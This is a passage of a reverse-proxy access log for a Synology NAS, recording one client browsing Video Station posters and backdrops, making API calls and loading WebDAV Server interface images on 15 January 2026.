"https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28431&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14299&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28833&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14301&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28837&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28647&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:52 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28493&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=29383&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=29370&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=29389&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=29622&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28861&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28883&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=29111&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28585&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28939&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28955&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28758&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=27306&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=27312&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=27277&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=27282&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28431&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28833&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:53 +0000] - 404 404 - GET https nas.profibot.hu "/webapi/entry.cgi?mapper_id=28837&mtime=&api=SYNO.VideoStation2.Backdrop&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 8447] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:54 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=home_video&id=940&mtime=2025-08-03%2017%3A38%3A51.586337&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 74648] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:54 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=home_video&id=938&mtime=2025-08-03%2017%3A38%3A39.339029&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 67378] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:54 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=home_video&id=939&mtime=2025-08-03%2017%3A38%3A45.188822&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 20424] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:54 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=home_video&id=937&mtime=2025-08-03%2017%3A38%3A34.788433&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 18475] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:54 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=home_video&id=936&mtime=2025-08-03%2017%3A38%3A13.842832&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 19241] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:54 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=home_video&id=935&mtime=2025-08-03%2017%3A24%3A19.696692&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 79244] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:54 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14638&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:54 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14637&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14636&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14635&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14634&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14633&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14632&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:55 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?type=movie&id=14631&mtime=&api=SYNO.VideoStation2.Poster&method=get&version=1&SynoToken=MbvSA7Zte.JE6" [Client 84.1.26.27] [Length 1464] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/?launchApp=SYNO.SDS.VideoStation.AppInstance&SynoToken=MbvSA7Zte.JE6" +[15/Jan/2026:13:53:57 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 11040] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:59 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:53:59 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:01 +0000] - 101 101 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=MbvSA7Zte.JE6&UserType=user&EIO=3&transport=websocket&sid=Eg4WDlNnvPf9JcJbAAAD" [Client 84.1.26.27] [Length 202] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[15/Jan/2026:13:54:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:01 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:06 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:07 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:11 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:11 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 11041] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:12 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:54:14 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/WebDAVServer/images/1x/icon_calendar.png" [Client 84.1.26.27] [Length 2510] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/WebDAVServer/style.css?v=1767609886" +[15/Jan/2026:13:54:14 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/WebDAVServer/images/1x/icon_settings.png" [Client 84.1.26.27] [Length 3659] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/3rdparty/WebDAVServer/style.css?v=1767609886" +[15/Jan/2026:13:54:14 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/fieldset_arrow.png?v=e9087ed3a24f4f1e4f30d52ce4123c82" [Client 84.1.26.27] [Length 1206] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:54:14 +0000] - 200 200 - GET https 